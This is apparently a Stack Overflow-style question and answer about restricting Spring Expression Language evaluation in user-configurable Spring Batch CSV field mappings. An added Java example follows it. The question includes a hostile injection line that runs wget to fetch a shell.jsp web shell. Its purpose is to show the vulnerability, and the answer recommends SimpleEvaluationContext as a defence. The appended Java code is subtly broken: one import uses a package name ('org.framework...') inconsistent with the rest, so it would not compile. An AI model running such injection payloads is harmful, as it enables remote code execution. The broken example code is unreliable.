
Can Spring-EL expressions be executed within a sandbox?


I am using Spring-EL to create dynamic CSV-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes.) This is working very well, but the idea is that it must be possible for a user to create such a mapping configuration.

The problem is that the Spring-EL expressions are not executed inside a kind of sandbox, and therefore it is very easy to inject evil code. For example:

name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")

My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find anything related to this topic. Or maybe Spring-EL is not the right choice for the job?

Example of what I am trying to achieve:

name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)

Solution

  • The SimpleEvaluationContext has been designed to decrease application vulnerabilities.

    See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:

    SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.

    EDIT: Note, as the OP commented on his own question, that this can be used to allow instance methods to be called by doing the following:

    SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
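To make the answer concrete, here is an added Java example (not from the question, the answer, or the Spring documentation) that evaluates the question's mapping expressions against a constructed CSV row inside a SimpleEvaluationContext and shows a T(...) type reference being rejected. The CsvRow class, the row contents, and the use of String instance methods in place of the question's concat/split helpers are assumptions made for this example.

```java
import java.util.Arrays;
import java.util.List;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.framework.expression.spel.support.SimpleEvaluationContext;

public class SandboxedMappingDemo {

    // Root object the expressions see: one parsed CSV row (constructed for this example).
    // Only the getter is public, so "column" is the only property reachable from SpEL.
    public static class CsvRow {
        private final List<String> column;
        public CsvRow(List<String> column) { this.column = column; }
        public List<String> getColumn() { return column; }
    }

    // Evaluates one user-supplied mapping expression inside the restricted context.
    static Object evaluate(ExpressionParser parser, EvaluationContext ctx, String expr) {
        return parser.parseExpression(expr).getValue(ctx);
    }

    public static void main(String[] args) {
        // Constructed sample row with the column positions used in the question.
        String[] cells = new String[20];
        Arrays.fill(cells, "");
        cells[0] = "Alice"; cells[3] = "1990/05/12"; cells[18] = "Science"; cells[19] = "Fiction";
        CsvRow row = new CsvRow(Arrays.asList(cells));

        // Sandboxed context: read-only property access, instance methods on the row's values
        // allowed, but no T(...) type references, constructors, bean references or assignment.
        // Instance methods are still a broad surface, so keep the root object minimal.
        EvaluationContext sandbox = SimpleEvaluationContext
                .forReadOnlyDataBinding()
                .withInstanceMethods()
                .withRootObject(row)
                .build();
        ExpressionParser parser = new SpelExpressionParser();

        // The question's mappings: first column; columns 18 and 19 joined with a space;
        // the first '/'-separated segment of column 3.
        System.out.println(evaluate(parser, sandbox, "column[0]"));
        System.out.println(evaluate(parser, sandbox, "column[18].concat(' ').concat(column[19])"));
        System.out.println(evaluate(parser, sandbox, "column[3].split('/')[0]"));

        // A type reference like the one in the question fails at evaluation time:
        // SimpleEvaluationContext has no TypeLocator, so T(...) raises a SpelEvaluationException.
        try {
            evaluate(parser, sandbox, "T(java.lang.Runtime).getRuntime()");
            System.out.println("UNEXPECTED: type reference was allowed");
        } catch (EvaluationException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```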